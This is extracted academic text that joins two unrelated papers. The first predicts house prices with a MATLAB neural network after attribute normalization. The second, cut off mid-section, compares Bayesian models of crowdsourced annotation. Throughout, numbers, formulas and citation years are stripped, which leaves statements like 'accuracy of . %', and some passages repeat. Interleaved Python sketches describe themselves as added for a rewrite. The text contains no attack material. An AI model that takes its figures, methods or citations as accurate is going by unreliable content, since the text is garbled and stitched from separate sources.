linear regression is a linear equation established between the independent variable and the dependent variable. this is the most well-known regression model. in this type of model, the independent variable may be discrete or continuous; the dependent variable must be continuous, and the nature of linear regression is linear. logistic regression is a logistic equation built from independent variables to dependent variables. this is a regression model used to calculate the success or failure of an event. in this type of model, the independent variable may be discrete or continuous; the dependent variable must be in the interval [ ] . polynomial regression is a polynomial equation established between the independent variable and the dependent variable. this is a polynomial regression model commonly used in the field of deep learning. under this model, a low polynomial degree leads to underfitting, and a high polynomial degree leads to overfitting. when dealing with multiple independent variables, stepwise regression is needed[ ]. standard stepwise regression does two things, adding or removing independent variables at each step. in this technique, the selection of independent variables is done by means of an automated process, which does not involve manual intervention. b. research methods for data fusion data fusion[ ] is a technology that fuses attribute values from different attributes. fusion of multiple attributes will get better performance results than a single attribute. data fusion is widely used in multidisciplinary and multi-scenario integration fields. for example, you can monitor the patient's physiological and psychological information through different hardware devices, and finally obtain the patient's physical condition through data fusion. there are many similar examples. there are also many difficulties in data fusion. the first is how to deal with different attributes, and the second is how to fuse the data. there are many difficulties in data fusion design. the first is how to handle different attribute types, and the second is how to fuse attributes. this thesis will detail the processing method of the attribute type in the "handling of attribute types" section and the data fusion method in the "data fusion" section. c. handling of attribute types the attribute type refers to the data type of the attribute. the attribute types are: large_attributes, small_attributes, intermediate_attributes, and interval_attributes[ ]. ) large_attributes the large_attributes are the larger the independent variable, the larger the dependent variable, that is, the independent variable will have a positive benefit on the dependent variable, in other words, there is a positive correlation between the dependent variable and the independent variable. the processing method for very large attributes is shown in ( ). international journal of advanced network, monitoring and controls volume , no. ,  ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. ) small_attributes the small_attributes refers to: the larger the independent variable, the smaller the value of the dependent variable, that is, the independent variable will have a negative benefit on the dependent variable, in other words there is a negative correlation between the independent variable and the dependent variable. the processing method of extremely small attributes is shown in ( ). 
 ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. after processing by the above method, the extremely small attributes have been transformed into extremely large attributes. ) intermediate_attributes intermediate_attributes refer to the existence of a threshold. when the independent variable is smaller than the threshold, it displays the characteristics of large_attributes. when the independent variable is larger than the threshold, it displays the characteristics of small_attributes. specifically, when the independent variable is less than the threshold, there is a positive correlation between the independent variable and the dependent variable; when the independent variable is greater than the threshold, there is a negative correlation between the independent variable and the dependent variable. the processing method of intermediate_attributes is shown in ( ). {  ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value; is the threshold. after processing by the above method, the interval attribute has been transformed into large_attributes. ) enumerated_attributes enumerated_attributes means that the attribute value of the independent variable does not have real measurement characteristics, and the result of the dependent variable will be affected by the value of the independent variable, but this influence relationship is difficult to express. the processing method of enumerated_attributes is as follows: step : list all the values of the input attributes; suppose the input attribute contains attribute values: 、 、…、 ; step : convert the attribute value to one-hot [ ] form; among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ; among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ;…… among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ; so far, all values of the attribute have been expressed as one-hot form. d. data fusion this section analyzes the problem of data fusion, that is, how to merge large_attributes, small_attributes, interval_attributes, and enumerated_attributes together. this thesis will propose a pixel-based data fusion method: first establish a pixel matrix; then use a fully connected neural network model to process the pixel matrix. ) create a pixel matrix this section aims to transform multiple attributes into a pixel arrangement. specifically, it is assumed that the sample contains samples and each sample contain attributes, that is, all values for the sample are: , , …, , …, , …, ; all values for the sample are: , , …, …, , …, ; international journal of advanced network, monitoring and controls volume , no. , …… all values for the sample are: , …, …, …, . then, the pixel matrix is:( ) ; and the pixel matrix is:( ) ; …… and the pixel matrix is:( ) . ) processing pixel matrix in "create a pixel matrix", this article has already established the number of pixel matrices as the number of samples, and then we need to use the neural network to process the pixel matrix. 
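before turning to the network itself, the sketch below collects the attribute-handling rules of the preceding section in code form. the large- and small-attribute rules are the usual min-max normalizations the text describes; the exact piecewise formula for intermediate attributes was lost in extraction, so the version here is one common convention and should be read as an assumption, as should all function names and the variable names in the trailing usage comment.

import numpy as np

def normalize_large(x):
    # large_attributes: a bigger raw value maps to a bigger normalized value
    x = np.asarray(x, dtype=float)
    return (x - x.min()) / (x.max() - x.min())

def normalize_small(x):
    # small_attributes: a bigger raw value maps to a smaller normalized value ("larger is better" after conversion)
    x = np.asarray(x, dtype=float)
    return (x.max() - x) / (x.max() - x.min())

def normalize_intermediate(x, threshold):
    # intermediate_attributes: positive correlation below the threshold, negative above it
    x = np.asarray(x, dtype=float)
    span = max(threshold - x.min(), x.max() - threshold)
    return 1.0 - np.abs(x - threshold) / span

def one_hot(values):
    # enumerated_attributes: each distinct value becomes a 0/1 indicator vector
    levels = sorted(set(values))
    out = np.zeros((len(values), len(levels)))
    for row, v in enumerate(values):
        out[row, levels.index(v)] = 1.0
    return out

# a per-sample "pixel matrix" is then simply the row of normalized attribute values, e.g.:
# features = np.column_stack([normalize_small(house_age), normalize_small(distance),
#                             normalize_large(store_count)])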
the choice of network structure: there are many neural network model structures, such as fully connected layer neural networks, convolutional neural networks, long-short-term memory networks, and residual network. because the application scenario in this paper is simple, it is more appropriate to choose a fully connected neural network model. selection of activation function: the activation function is a function that runs on the neuron and is responsible for mapping the input of the neuron to the output. the activation functions are: function (figure ), function (figure ), function (figure ), function (figure ), where is a special form of . regarding the selection principle of the activation function, andrew ng gives the following reference scheme in “neural networks and deep learning”: is very common in machine learning. the activation function is generally defaulted to . is generally better than , but the scope of use of wider; the activation function used in the output layer of the binary classification problem is , and was rarely used in other cases; is almost always better than . and have a disadvantage that when the independent variable is large, the slope is small. the gradient descent method is limited; except for the output layer, linear activation functions are rarely used; neural network models use activation functions, which will lead to the final result being a linear combination of input feature vectors. figure . sigmoid figure . tanh figure . relu figure . leaky relu iii. normalization of attributes this part needs to normalize the attributes involved in the data set: first analyze the data type of the attributes by "attribute analysis"; then normalize the attributes by "normalization". international journal of advanced network, monitoring and controls volume , no. , a. attribute analysis as mentioned in "data sources", the data in this paper is derived from boston house price data provided by kaggle, and the amount of data selected this time is relatively small. the data set contains training samples and test samples, for a total of sample data. in the problem of house price prediction, there are attributes that affect house prices: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;. dependent variable: house price . transaction date is a time variable; the house age is a small_attributes; distance from the subway station is a small_attributes; the number of convenience stores in the walking circle is a large_attributes; the dimension of the house and the longitude of the house are an enumerated_attributes. b. normalization transaction date is a time variable; the house age is a small_attributes; distance from the subway station is a small_attributes; the number of convenience stores in the walking circle is a large_attributes; the dimension of the house and the longitude of the house are an enumerated_attributes. iv. data fusion in this part, the normalized data in "normalization of attributes" needs to be fused: first, the pixel matrix is established by "building a pixel matrix"; then the fully connected neural network model is established by "building a neural network model". a. building a pixel matrix a pixel matrix can be established by "data fusion". as described in "data sources", the data in this paper is derived from boston house price data provided by kaggle. the amount of data selected is small. 
the data set contains training samples and test samples, for a total of sample data. then there are: all values for the sample: ,…, ; all values for the sample: , , …, ; …… all values for the sample: , …, . b. building a neural network model the paper will eventually build a neural network model of house attributes to house prices: where the input attributes are house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price . step : design the network structure through the analysis of "data fusion", this paper will build a fully connected neural network model. the network model structure is shown in (figure network structure): the input layer of the network structure contains input nodes; the network structure contains hidden layers, each of which contains nodes; the output layer of the network structure contains output node; all activation functions use function; training period: ; target accuracy is: ; learning rate: . figure . network structure step : selection of training tools there are many ways to train neural networks, such as tensorflow, caffe, mxnet, torch, theano in python, and nntool in matlab. nntool is a network model training tool that is easy to deploy and simple in the environment. in this paper, the neural network model shown in (figure network structure) is trained by nntool (figure nntool). figure . nntool international journal of advanced network, monitoring and controls volume , no. , step : code design see appendix step : training process in the process of neural network training using matlab, part of the training process is shown in (figure training process). among them, performance is shown in (figure performance); training state is shown in (figure training state); regression is shown in (figure regression). figure . training process figure . performance figure . training state figure . regression step : results the results of the neural network model include two parts: one is the partial result display, as shown in (figure result); the other is the error proportion chart, as shown in (figure error_raph). as can be seen from the (figure regression), the accuracy of the network model is . %. international journal of advanced network, monitoring and controls volume , no. , figure . result figure . error_raph v. summary this paper finally established a neural network model from house attributes to house prices: where the input attributes are commodity house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price .after the neural network model has been established, enter the six attributes of the commercial house into this neural network model, and you can get the corresponding house price. the accuracy of the network model is . %. vi. appendix [pn,minp,maxp,tn,mint,maxt]=premnmx(p,t); nodenum = ; nodenum = ; nodenum = ; nodenum = ; nodenum = ; typenum = ; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; net=newff(minmax(pn),[nodenum ,nodenum ,n odenum ,nodenum ,nodenum ,typenum],{tf tf tf tf tf tf },'traingdx'); %traingdm net.trainparam.show= ; net.trainparam.epochs= ; net.trainparam.goal= e- ; net.trainparam.lr= . 
; net=train(net,pn,tn); p n=tramnmx(ptest,minp,maxp); an=sim(net,p n); [a]=postmnmx(an,mint,maxt) plot( :length(t),t,'o', :length(t)+ ,a,'+'); title('o:predictive_value--- *:actual_value') grid on m=length(a); t =[t,a(m)]; error=t -a; figure plot( :length(error),error,'-.') title('error_graph') grid on international journal of advanced network, monitoring and controls volume , no. , references [ ] lee w c, cheong t s, wu y. the impacts of financial development, urbanization, and globalization on income inequality: a regression- based decomposition approach [j]. ssrn electronic journal, . [ ] tan paul. house prices have been stagnant [j]. journalist observation, ( ). [ ] gogtay n j, deshpande s p, thatte u m. principles of regression analysis [j]. the journal of the association of physicians of india, , ( ): - . [ ] gooch j w. stepwise regression [j]. encyclopedic dictionary of polymers, . [ ] bleiholder j, naumann f. data fusion [j]. acm computing surveys, , ( ): - . [ ] han zhonggeng. mathematical model for comprehensive evaluation and prediction of yangtze river water quality [j]. journal of engineering mathematics ( ): - . [ ] shuntaro okada, masayuki ohzeki, shinichiro taguchi. efficient partition of integer optimization problems with one-hot encoding[j]. scientific reports, , ( ). [ ] wang zhaoqing, lu xiaoyang. a macro element method for solving potential problems based on mean value interpolation [j]. journal on numerical methods and computer applications ( ): - . [ ] hershey s, chaudhuri s, ellis d p w, et al. cnn architectures for large-scale audio classification[c]// . comparing bayesian models of annotation silviu paun bob carpenter jon chamberlain dirk hovy udo kruschwitz massimo poesio school of electronic engineering and computer science, queen mary university of london department of statistics, columbia university school of computer science and electronic engineering, university of essex department of marketing, bocconi university abstract the analysis of crowdsourced annotations in natural language processing is con- cerned with identifying ( ) gold standard labels, ( ) annotator accuracies and biases, and ( ) item difficulties and error patterns. traditionally, majority voting was used for , and coefficients of agreement for and . lately, model-based analysis of corpus annotations have proven better at all three tasks. but there has been relatively little work comparing them on the same datasets. this paper aims to fill this gap by ana- lyzing six models of annotation, covering different approaches to annotator ability, item difficulty, and parameter pooling (tying) across annotators and items. we evaluate these models along four aspects: comparison to gold labels, predictive accu- racy for new annotations, annotator char- acterization, and item difficulty, using four datasets with varying degrees of noise in the form of random (spammy) annotators. we conclude with guidelines for model selec- tion, application, and implementation. introduction the standard methodology for analyzing crowd- sourced data in nlp is based on majority vot- ing (selecting the label chosen by the majority of coders) and inter-annotator coefficients of agree- ment, such as cohen’s κ (artstein and poesio, ). however, aggregation by majority vote implicitly assumes equal expertise among the annotators. this assumption, though, has been re- peatedly shown to be false in annotation prac- tice (poesio and artstein, ; passonneau and carpenter, ; plank et al., b). 
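as a concrete point of reference for the model-based alternatives discussed below, the majority-vote aggregation criticized here can be written in a few lines (an illustrative python sketch, not code from the paper); note that it has no notion of annotator ability and that ties are broken arbitrarily.

from collections import Counter, defaultdict

def majority_vote(annotations):
    # annotations: iterable of (item_id, annotator_id, label) triples.
    labels_per_item = defaultdict(list)
    for item, _, label in annotations:
        labels_per_item[item].append(label)
    # pick the most frequent label per item; every annotator counts equally,
    # which is exactly the assumption the paper argues against.
    return {item: Counter(labels).most_common(1)[0][0]
            for item, labels in labels_per_item.items()}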
chance-adjusted coefficients of agreement also have many shortcomings—for example, agreements in mistake, overly large chance-agreement in datasets with skewed classes, or no annotator bias correction (feinstein and cicchetti, ; passonneau and carpenter, ). research suggests that models of annotation can solve these problems of standard practices when applied to crowdsourcing (dawid and skene, ; smyth et al., ; raykar et al., ; hovy et al., ; passonneau and carpenter, ). such probabilistic approaches allow us to characterize the accuracy of the annotators and correct for their bias, as well as accounting for item-level effects. they have been shown to perform better than non-probabilistic alternatives based on heuristic analysis or adjudication (quoc viet hung et al., ). but even though a large number of such models has been proposed (carpenter, ; whitehill et al., ; raykar et al., ; hovy et al., ; simpson et al., ; passonneau and carpenter, ; felt et al., a; kamar et al., ; moreno et al., , inter alia), it is not immediately obvious to potential users how these models differ or, in fact, how they should be applied at all. to our knowledge, the literature comparing models of annotation is limited, focused exclusively on synthetic data (quoc viet hung et al., ) or using publicly available implementations that constrain the experiments almost exclusively to binary annotations (sheshadri and lease, ). contributions • our selection of six widely used models (dawid and skene, ; carpenter, ; hovy et al., ) covers models with varying degrees of complexity: pooled models, which assume all annotators share the same ability; unpooled models, which model individual annotator parameters; and partially pooled models, which use a hierarchical structure to let the level of pooling be dictated by the data. • we carry out the evaluation on four datasets with varying degrees of sparsity and annotator accuracy in both gold-standard dependent and independent settings. • we use fully bayesian posterior inference to quantify the uncertainty in parameter estimates. • we provide guidelines for both model selection and implementation. our findings indicate that models which include annotator structure generally outperform other models, though unpooled models can overfit. several open-source implementations of each model type are available to users. figure : plate diagram for multinomial model. the hyperparameters are left out. bayesian annotation models all bayesian models of annotation that we describe are generative: they provide a mechanism to generate parameters θ characterizing the process (annotator accuracies and biases, prevalence, etc.) from the prior p(θ), then generate the observed labels y from the parameters according to the sampling distribution p(y|θ). bayesian inference allows us to condition on some observed data y to draw inferences about the parameters θ; this is done through the posterior, p(θ|y). the uncertainty in such inferences may then be used in applications such as jointly training classifiers (smyth et al., ; raykar et al., ), comparing crowdsourcing systems (lease and kazai, ), or characterizing corpus accuracy (passonneau and carpenter, ). this section describes the six models we evaluate.
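before the individual models, a toy illustration of this generative/posterior view (added for this rewrite, with made-up numbers): a single annotator whose chance of producing the correct label is theta, a beta prior on theta, and a closed-form posterior after observing how often their labels matched the truth. the six models below generalize exactly this pattern to multiple classes, annotators, and items.

def posterior_accuracy(correct, total, prior_a=1.0, prior_b=1.0):
    # a beta(prior_a, prior_b) prior on theta plus a binomial likelihood gives a
    # beta(prior_a + correct, prior_b + total - correct) posterior (conjugacy).
    a = prior_a + correct
    b = prior_b + (total - correct)
    return a, b, a / (a + b)

# e.g. 27 correct labels out of 30 under a uniform beta(1, 1) prior
print(posterior_accuracy(27, 30))  # -> (28.0, 4.0, 0.875)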
these models are drawn from the litera- ture, but some had to be generalized from binary to multiclass annotations. the generalization nat- urally comes with parameterization changes, al- though these do not alter the fundamentals of the models. (one aspect tied to the model parameter- ization is the choice of priors. the guideline we followed was to avoid injecting any class prefer- ences a priori and let the data uncover this infor- mation; see more in § .) figure : plate diagram of the dawid and skene model. . a pooled model multinomial (multinom) the simplest bayesian model of annotation is the binomial model pro- posed in albert and dodd ( ) and discussed in carpenter ( ). this model pools all annota- tors (i.e., assumes they have the same ability; see figure ). the generative process is: • for every class k ∈{ , , ...,k}: – draw class-level abilities ζk ∼ dirichlet( k ) • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(ζci) . unpooled models dawid and skene (d&s) the model proposed by dawid and skene ( ) is, to our knowledge, the first model-based approach to annotation proposed in the literature. it has found wide application (e.g., kim and ghahramani, ; simpson et al., ; passonneau and carpenter, ). it is an unpooled model, namely, each annotator has their own response parameters (see figure ), which are given fixed priors. its generative process is: • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k ∼ dirichlet( k ) carpenter ( ) parameterizes ability in terms of specificity and sensitivity. for multiclass annotations, we generalize to a full response matrix (passonneau and carpenter, ). notation: k is a k-dimensional vector of values. dawid and skene fit maximum likelihood estimates us- ing expectation maximization (em), but the model is easily extended to include fixed prior information for regularization, or hierarchical priors for fitting the prior jointly with the abil- ity parameters and automatically performing partial pooling. figure : plate diagram for the mace model. • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(βjj[i,n],ci) multi-annotator competence estimation (mace) this model, introduced by hovy et al. ( ), takes into account the credibility of the annotators and their spamming preference and strategy (see figure ). this is another example of an unpooled model, and possibly the model most widely applied to linguistic data (e.g., plank et al., a; sabou et al., ; habernal and gurevych, , inter alia). its generative process is: • for every annotator j ∈{ , , ...,j}: – draw spamming behavior �j ∼ dirichlet( k ) – draw credibility θj ∼ beta( . , . ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ uniform – for every position n ∈{ , , ...,ni}: ∗ draw a spamming indicator si,n ∼ bernoulli( −θjj[i,n]) ∗ if si,n = then: · yi,n = ci ∗ else: · yi,n ∼ categorical(�jj[i,n]) . partially pooled models hierarchical dawid and skene (hierd&s) in this model, the fixed priors of dawid and skene are replaced with hierarchical priors representing notation: jj[i,n] gives the index of the annotator who produced the n-th annotation on item i. that is, propensity to produce labels with malicious intent. 
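to make the generative story of the unpooled models concrete, the sketch below (illustrative code written for this rewrite, with arbitrary sizes and seed) draws a dataset from the dawid and skene process just described: uniform dirichlet prevalence and per-annotator confusion rows, a latent true class per item, and annotations drawn from the annotator's confusion row for that class. a mace-style simulation would differ only in replacing the confusion matrix with a per-annotator credibility and spamming distribution.

import numpy as np

rng = np.random.default_rng(0)

def simulate_dawid_skene(I=500, J=10, K=4, n_per_item=3):
    # class prevalence pi ~ dirichlet(1_K)
    pi = rng.dirichlet(np.ones(K))
    # per-annotator, per-true-class response rows beta[j, k] ~ dirichlet(1_K)
    beta = rng.dirichlet(np.ones(K), size=(J, K))
    true_classes = rng.choice(K, size=I, p=pi)
    annotations = []
    for i, c in enumerate(true_classes):
        for j in rng.choice(J, size=n_per_item, replace=False):
            label = rng.choice(K, p=beta[j, c])
            annotations.append((i, int(j), int(label)))
    return pi, beta, true_classes, annotations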
figure : plate diagram for the hierarchical dawid and skene model. the overall population of annotators (see figure ). this structure provides partial pooling, using in- formation about the population to improve esti- mates of individuals by regularizing toward the population mean. this is particularly helpful with low count data as found in many crowdsourcing tasks (gelman et al., ). the full generative process is as follows: • for every class k ∈{ , , ...,k}: – draw class ability means ζk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class s.d.’s Ωk,k′ ∼ halfnormal( , ),∀k′ • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k,k′ ∼ normal(ζk,k′, Ωk,k′ ),∀k′ • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(softmax(βjj[i,n],ci)) item difficulty (itemdiff) we also test an exten- sion of the “beta-binomial by item” model from carpenter ( ), which does not assume any an- notator structure; instead, the annotations of an item are made to depend on its intrinsic difficulty. the model further assumes that item difficulties are instances of class-level hierarchical difficulties (see figure ). this is another example of a a two-class version of this model can be found in carpenter ( ) under the name “beta-binomial by anno- tator.” the argument of the softmax is a k-dimensional vector of annotator abilities given the true class, i.e., βjj[i,n],ci = (βjj[i,n],ci, , ...,βjj[i,n],ci,k). figure : plate diagram for the item difficulty model. partially pooled model. its generative process is presented here: • for every class k ∈{ , , ...,k}: – draw class difficulty means: ηk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class s.d.’s xk,k′ ∼ halfnormal( , ),∀k′ • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – draw item difficulty θi,k ∼ normal(ηci,k,xci,k),∀k – for every position n ∈{ , , ...,ni}: ∗ draw annotation: yi,n ∼ categorical(softmax(θi)) logistic random effects (logrndeff) the last model is the logistic random effects model (carpenter, ), which assumes the annotations depend on both annotator abilities and item dif- ficulties (see figure ). both annotator and item parameters are drawn from hierarchical priors for partial pooling. its generative process is given as: • for every class k ∈{ , , ...,k}: – draw class ability means ζk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class ability s.d.’s Ωk,k′ ∼ halfnormal( , ),∀k′ – draw class difficulty s.d.’s xk,k′ ∼ halfnormal( , ),∀k′ • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k,k′ ∼ normal(ζk,k′, Ωk,k′ ),∀k′ • draw class prevalence π ∼ dirichlet( k ) figure : plate diagram for the logistic random effects model. • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – draw item difficulty: θi,k ∼ normal( ,xci,k),∀k – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(softmax(βjj[i,n],ci−θi)) implementation of the models we implemented all models in this paper in stan (carpenter et al., ), a tool for bayesian inference based on hamiltonian monte carlo. although the non-hierarchical models we present can be fit with (penalized) maximum likeli- hood (dawid and skene, ; passonneau and carpenter, ), there are several advantages to a bayesian approach. 
first and foremost, it pro- vides a mean for measuring predictive calibration for forecasting future results. for a well-specified model that matches the generative process, bayesian inference provides optimally calibrated inferences (bernardo and smith, ); for only roughly accurate models, calibration may be mea- sured for model comparison (gneiting et al., ). calibrated inference is critical for mak- ing optimal decisions, as well as for forecast- ing (berger, ). a second major benefit of bayesian inference is its flexibility in combining submodels in a computationally tractable manner. for example, predictors or features might be hierarchical models are challenging to fit with classical methods; the standard approach, maximum marginal likeli- hood, requires marginalizing the hierarchical parameters, fit- ting those with an optimizer, then plugging the hierarchical parameter estimates in and repeating the process on the coef- ficients (efron, ). this marginalization requires either a custom approximation per model in terms of either quadra- ture or markov chain monte carlo to compute the nested integral required for the marginal distribution that must be optimized first (martins et al., ). available to allow the simple categorical preva- lence model to be replaced with a multilogistic regression (raykar et al., ), features of the annotators may be used to convert that to a re- gression model, or semi-supervised training might be carried out by adding known gold-standard la- bels (van pelt and sorokin, ). each model can be implemented straightforwardly and fit ex- actly (up to some degree of arithmetic precision) using markov chain monte carlo methods, al- lowing a wide range of models to be evaluated. this is largely because posteriors are much bet- ter behaved than point estimates for hierarchical models, which require custom solutions on a per- model basis for fitting with classical approaches (rabe-hesketh and skrondal, ). both of these benefits make bayesian inference much simpler and more useful than classical point estimates and standard errors. convergence is assessed in a standard fash- ion using the approach proposed by gelman and rubin ( ): for each model we run four chains with diffuse initializations and verify that they converge to the same mean and variances (using the criterion r̂ < . ). hierarchical priors, when jointly fit with the rest of the parameters, will be as strong and thus sup- port as much pooling as evidenced by the data. for fixed priors on simplexes (probability parameters that must be non-negative and sum to . ), we use uniform distributions (i.e., dirichlet( k )). for lo- cation and scale parameters, we use weakly infor- mative normal and half-normal priors that inform the scale of the results, but are not otherwise sen- sitive. as with all priors, they trade some bias for variance and stabilize inferences when there is not much data. the exception is mace, for which we used the originally recommended priors, to con- form with the authors’ motivation. all model implementations are available to readers online at http://dali.eecs. qmul.ac.uk/papers/supplementary_ material.zip. evaluation the models of annotation discussed in this paper find their application in multiple tasks: to label items, characterize the annotators, or flag espe- cially difficult items. this section lays out the met- rics used in the evaluation of each of these tasks. 
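as a side note on the convergence check described above, the gelman and rubin statistic for a scalar parameter can be computed directly from the draws of several chains; the following is a standard textbook formulation added for this rewrite, not the authors' code.

import numpy as np

def gelman_rubin_rhat(chains):
    # chains: array of shape (n_chains, n_draws) for one scalar parameter.
    chains = np.asarray(chains, dtype=float)
    m, n = chains.shape
    chain_means = chains.mean(axis=1)
    w = chains.var(axis=1, ddof=1).mean()      # mean within-chain variance
    b = n * chain_means.var(ddof=1)            # between-chain variance
    var_hat = (n - 1) / n * w + b / n          # pooled estimate of posterior variance
    return float(np.sqrt(var_hat / w))

# values close to 1 indicate that the chains have mixed to the same mean and
# variance; clearly larger values mean more iterations (or reparameterization)
# are needed.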
dataset i n j k j/i i/j wsd rte temp pd table : general statistics (i items, n observations, j annotators, k classes) together with summary statis- tics for the number of annotators per item (j/i) and the number of items per annotator (i/j) (i.e., min, st quartile, median, mean, rd quartile, and max). . datasets we evaluate on a collection of datasets reflect- ing a variety of use-cases and conditions: binary vs. multi-class classification; small vs. large num- ber of annotators; sparse vs. abundant num- ber of items per annotator / annotators per item; and varying degrees of annotator quality (statis- tics presented in table ). three of the datasets— wsd, rte, and temp, created by snow et al. ( )—are widely used in the literature on an- notation models (carpenter, ; hovy et al., ). in addition, we include the phrase detec- tives . (pd) corpus (chamberlain et al., ), which differs in a number of key ways from the snow et al. ( ) datasets: it has a much larger number of items and annotations, greater sparsity, and a much greater likelihood of spamming due to its collection via a game-with-a-purpose setting. this dataset is also less artificial than the datasets in snow et al. ( ), which were created with the express purpose of testing crowdsourcing. the data consist of anaphoric annotations, which we reduce to four general classes (dn/do = discourse new/old, pr = property, and nr = non-referring). to ensure similarity with the snow et al. ( ) datasets, we also limit the coders to one annotation per item (discarded data were mostly redundant annotations). furthermore, this corpus allows us to evaluate on meta-data not usually available in traditional crowdsourcing platforms, namely, in- formation about confessed spammers and good, established players. . comparison against a gold standard the first model aspect we assess is how accu- rately they identify the correct (“true”) label of the items. the simplest way to do this is by com- paring the inferred labels against a gold standard, http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip using standard metrics such as precision / re- call / f-measure, as done, for example, for the evaluation of mace in hovy et al. ( ). we check whether the reported differences are statis- tically significant, using bootstrapping (the shift method), a non-parametric two-sided test (wilbur, ; smucker et al., ). we use a signifi- cance threshold of . and further report whether the significance still holds after applying the bonferroni correction for type errors. this type of evaluation, however, presupposes that a gold standard can be obtained. this as- sumption has been questioned by studies show- ing the extent of disagreement on annotation even among experts (poesio and artstein, ; passonneau and carpenter, ; plank et al., b). this motivates exploring complementary evaluation methods. . predictive accuracy in the statistical analysis literature, posterior predictions are a standard assessment method for bayesian models (gelman et al., ). we measure the predictive performance of each model using the log predictive density (lpd), that is, log p(ỹ|y), in a bayesian k-fold cross-validation setting (piironen and vehtari, ; vehtari et al., ). the set-up is straightforward: we partition the data into k subsets, each subset formed by splitting the annotations of each annotator into k random folds (we choose k = ). 
the splitting strategy ensures that models that cannot handle predictions for new annotators (i.e., unpooled models like d&s and mace) are nevertheless included in the comparison. concretely, we compute lpd = k∑ k= log p(ỹk|y(−k)) = k∑ k= log ∫ p(ỹk,θ|y(−k))dθ ≈ k∑ k= log m m∑ m= p(ỹk|θ(k,m)) ( ) in equation ( ), y(−k) and ỹk represent the items from the train and test data, for iteration k of the cross validation, while θ(k,m) is one draw from the posterior. . annotators’ characterization a key property of most of these models is that they provide a characterization of coder ability. in the d&s model, for instance, each annotator is modeled with a confusion matrix; passonneau and carpenter ( ) showed how different types of annotators (biased, spamming, adversarial) can be identified by examining this matrix. the same information is available in hierd&s and logrndeff, whereas mace characterizes coders by their level of credibility and spamming preference. we discuss these parameters with the help of the metadata provided by the pd corpus. some of the models (e.g., multinom or itemdiff) do not explicitly model annotators. however, an estimate of annotator accuracy can be derived post-inference for all the models. con- cretely, we define the accuracy of an annotator as the proportion of their annotations that match the inferred item-classes. this follows the cal- culation of gold-annotator accuracy (hovy et al., ), computed with respect to the gold standard. similar to hovy et al. ( ), we report the cor- relation between estimated and gold annotators’ accuracy. . item difficulty finally, the logrndeff model also provides an estimate that can be used to assess item difficulty. this parameter has an effect on the correctness of the annotators: namely, there is a subtractive relationship between the ability of an annotator and the item-difficulty parameter. the “difficulty” name is thus appropriate, although an examination of this parameter alone does not explicitly mark an item as difficult or easy. the itemdiff model does not model annotators and only uses the diffi- culty parameter, but the name is slightly mislead- ing because its probabilistic role changes in the absence of the other parameter (i.e., it now shows the most likely annotation classes for an item). these observations motivate an independent mea- sure of item difficulty, but there is no agreement on what such a measure could be. one approach is to relate the difficulty of an item to the confidence a model has in assigning it a label. this way, the difficulty of the items is judged under the subjectivity of the models, which in turn is influenced by their set of assumptions and data fitness. as in hovy et al. ( ), we mea- sure the model’s confidence via entropy to filter out the items the models are least confident in (i.e., the more difficult ones) and report accuracy trends. results this section assesses the six models along dif- ferent dimensions. the results are compared with those obtained with a simple majority vote (majvote) baseline. we do not compare the re- sults with non-probabilistic baselines as it has already been shown (see, e.g., quoc viet hung et al., ) that they underperform compared with a model of annotation. we follow the evaluation tasks and metrics dis- cussed in § and briefly summarized next. a core task for which models of annotation are used is to infer the correct interpretations from a crowd- sourced dataset of annotations. 
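the entropy-based confidence measure just described can be sketched as follows (illustrative numpy code added for this rewrite): items are ranked by the entropy of their posterior class distribution, the least confident ones are dropped, and accuracy is recomputed on the remainder.

import numpy as np

def accuracy_after_filtering(posterior, gold, keep_fraction):
    # posterior: array of shape (I, K) with each item's posterior class probabilities.
    # gold: array of shape (I,) with gold labels.
    # keep_fraction: fraction of items retained, dropping the highest-entropy
    # (least confident / most difficult) items first.
    entropy = -np.sum(posterior * np.log(np.clip(posterior, 1e-12, None)), axis=1)
    order = np.argsort(entropy)                       # most confident first
    keep = order[: max(1, int(keep_fraction * len(order)))]
    predictions = posterior.argmax(axis=1)
    return float((predictions[keep] == gold[keep]).mean())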
